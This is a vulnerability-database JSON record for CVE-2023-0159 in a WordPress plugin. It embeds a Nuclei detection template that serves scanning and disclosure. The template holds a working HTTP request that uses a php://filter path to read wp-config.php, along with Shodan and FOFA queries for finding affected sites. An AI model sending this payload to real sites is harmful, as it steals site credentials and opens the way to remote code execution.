{
  "_links": {
    "capec": {
      "href": "/api/v1/vulnerability/cve-2023-0159/capec"
    },
    "cvss": {
      "href": "/api/v1/vulnerability/cve-2023-0159/cvss"
    },
    "cwe": {
      "href": "/api/v1/vulnerability/cve-2023-0159/cwe"
    },
    "enrichment": {
      "href": "/api/v1/vulnerability/cve-2023-0159/enrichment"
    },
    "gcve": {
      "href": "/api/v1/vulnerability/cve-2023-0159/gcve"
    },
    "self": {
      "href": "/api/v1/vulnerability/cve-2023-0159"
    },
    "sightings": {
      "href": "/api/v1/sightings/cve-2023-0159"
    }
  },
  "data": {
    "nuclei": true,
    "nuclei_template": "http/cves/2023/CVE-2023-0159.yaml",
    "nuclei_template_severity": "high",
    "nuclei_template_yaml": "id: CVE-2023-0159\n\ninfo:\n  name: Extensive VC Addons for WPBakery page builder < 1.9.1 - Unauthenticated RCE\n  author: c4sper0\n  severity: high\n  description: |\n    The plugin does not validate a parameter passed to the php extract function when loading templates, allowing an unauthenticated attacker to override the template path to read arbitrary files from the hosts file system. This may be escalated to RCE using PHP filter chains.\n  impact: |\n    Unauthenticated attackers can exploit parameter validation flaws in the template loading mechanism to read arbitrary files including wp-config.php and escalate to remote code execution using PHP filter chains.\n  remediation: Fixed in 1.9.1\n  reference:\n    - https://wpscan.com/vulnerability/239ea870-66e5-4754-952e-74d4dd60b809/\n    - https://github.com/im-hanzou/EVCer\n    - https://github.com/nomi-sec/PoC-in-GitHub\n    - https://github.com/xu-xiang/awesome-security-vul-llm\n    - https://wordpress.org/plugins/extensive-vc-addon/\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n    cvss-score: 7.5\n    cve-id: CVE-2023-0159\n    epss-score: 0.55459\n    epss-percentile: 0.99004\n    cpe: cpe:2.3:a:wprealize:extensive_vc_addons_for_wpbakery_page_builder:*:*:*:*:*:wordpress:*:*\n  metadata:\n    max-request: 1\n    vendor: wprealize\n    product: \"extensive_vc_addons_for_wpbakery_page_builder\"\n    framework: wordpress\n    shodan-query: \"http.html:/wp-content/plugins/extensive-vc-addon/\"\n    fofa-query: \"body=/wp-content/plugins/extensive-vc-addon/\"\n    publicwww-query: \"/wp-content/plugins/extensive-vc-addon/\"\n  tags: cve,cve2023,wordpress,wpbakery,wp-plugin,lfi,extensive-vc-addon,wprealize,vkev,vuln\n\nhttp:\n  - raw:\n      - |\n        POST /wp-admin/admin-ajax.php HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-www-form-urlencoded\n\n        action=extensive_vc_init_shortcode_pagination&options[template]=php://filter/convert.base64-encode/resource=../wp-config.php\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - '{\"status\":\"success\",\"message\":\"Items are loaded\",\"data\":'\n\n      - type: status\n        status:\n          - 200\n# digest: 490a00463044022035b79b1a20dfe6b3538aca1658bfe3cd3650609c7099c98871cea5c69c23acf902205745f49370347f4e1ea8704f9662d7d6e6d446f7ff698fdd0575921d1e41c21b:922c64590222798bb761d5b6d8e72950"
  },
  "source": "nuclei",
  "vuln_id": "cve-2023-0159"
}